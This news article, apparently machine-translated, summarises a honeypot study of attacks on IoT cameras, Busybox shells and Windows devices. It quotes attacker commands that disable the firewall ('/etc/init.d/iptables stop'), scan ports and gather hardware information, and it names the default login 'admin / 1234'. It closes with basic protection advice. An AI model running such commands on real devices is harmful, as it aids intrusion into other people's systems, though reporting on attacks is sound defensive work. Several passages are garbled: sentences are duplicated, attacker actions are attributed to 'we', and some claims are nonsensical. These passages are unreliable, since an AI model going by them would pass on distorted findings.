Honeypot Experiments Reveal What Hackers Want from IoT Devices

news

A three-year honeypot experiment that simulated various types of vulnerable IoT devices has revealed why actors target certain devices, according to a new study.

https://arxiv.org/pdf/2112.10974.pdf

Analysis of the information obtained in this study shows that adversaries are actively looking for vulnerable IoT devices.
We show that a multifaceted and multi-stage approach can capture the activities of increasingly sophisticated attackers compared to a one-time honeypot.

In addition, our analysis of HoneyCamera logs shows that IoT camera devices are an interesting target for attacks.

A clustering approach to understand the large number of commands captured by honeypots and a clustering approach to understand the large number of commands captured by honeypots and a grouping algorithm that uses clusters of commands to infer the attacker’s intent and mode of operation.

More specifically, the honeypot was intended to create a sufficiently diverse ecosystem to cluster the generated data in such a way as to determine the adversary’s goals.

Internet of Things (IoT) devices are an expanding market that includes cameras, lighting, doorbells, smart TVs, motion sensors, speakers, thermostats, and other small devices connected to the Internet.

By 2025, more than 40 billion of these devices will be connected to the Internet, providing an entry point and resource into the network and being used as part of illicit crypto mining and DDoS attacks.

Setting up the honeypot

The honeypot ecosystem, built by researchers at NIST and the University of Florida, consists of three elements: server farms, screening systems, and data collection and analysis infrastructure.

We also installed ready-made IoT honeypot emulators Cowrie, Dionaea, KFSensor, and HoneyCamera to build a diverse ecosystem.

We’ve configured these instances to appear as real devices on Censys and Shodan, two specialized search engines that search for Internet-connected services.

There were three main types of honeypots.

  • HoneyShell – emulates Busybox
  • HoneyWindowsBox – emulates IoT devices running Windows
  • HoneyCamera – emulates various IP cameras such as Hikvision and D-Link

The novel item in this experiment is that it adjusts the honeypot in response to the attacker’s traffic and attack methods.

We used the collected data to modify the IoT configuration and defenses, and collected new data reflecting the attacker’s response to those changes.

Survey results

This experiment yielded a huge number of data, 22.6 million, the majority of which targeted HoneyShell honeypots.

The reason why various attackers showed similar attack patterns is because they had a common goal and means to achieve it.

For example, many attackers run commands such as “masscan” to scan for open ports, and “/etc/init.d/iptables stop” to disable the firewall.

We will also run “free -m”, “lspci grep VGA”, and “cat /proc/cpuinfo”, all three of which are intended to gather hardware information about the target device.

Interestingly, there were nearly 1 million attempts to use the username and password combination “admin / 1234”, reflecting the heavy use of this credential in IoT devices.

As for the ultimate purpose of the honeypots, we found that “HoneyShell” and “HoneyCamera” are mainly aimed at inducing DDoS attacks, and are often infected with Mirai variants and coin miners.

In Windows honeypots, coin miner infections were observed most frequently, followed by viruses, droppers, and Trojans.

In the case of HoneyCamera, we noticed that 29 attackers manually exploited the vulnerability by intentionally creating a vulnerability that exposed their credentials.

Only 314 112 (13%) unique sessions were detected that successfully executed at least one command in the honeypot

This result indicates that only a small percentage of attacks performed the next step, and that the remaining 87% only tried to find the correct username and password combination. The remaining 87% were just trying to find the correct username and password combination

How to protect your device

To prevent hackers from hijacking your IoT device, please take the following basic steps.

  • Change the default account to something unique and strong (long).
  • Set up a separate network for IoT devices and keep them isolated from critical assets.
  • Apply available firmware and other security updates as soon as possible, if they are available.
  • Proactively monitor IoT devices to detect signs of abuse

Most importantly, devices that do not need to be connected to the Internet should be placed behind a firewall or VPN to prevent unauthorized remote access.

Comments

タイトルとURLをコピーしました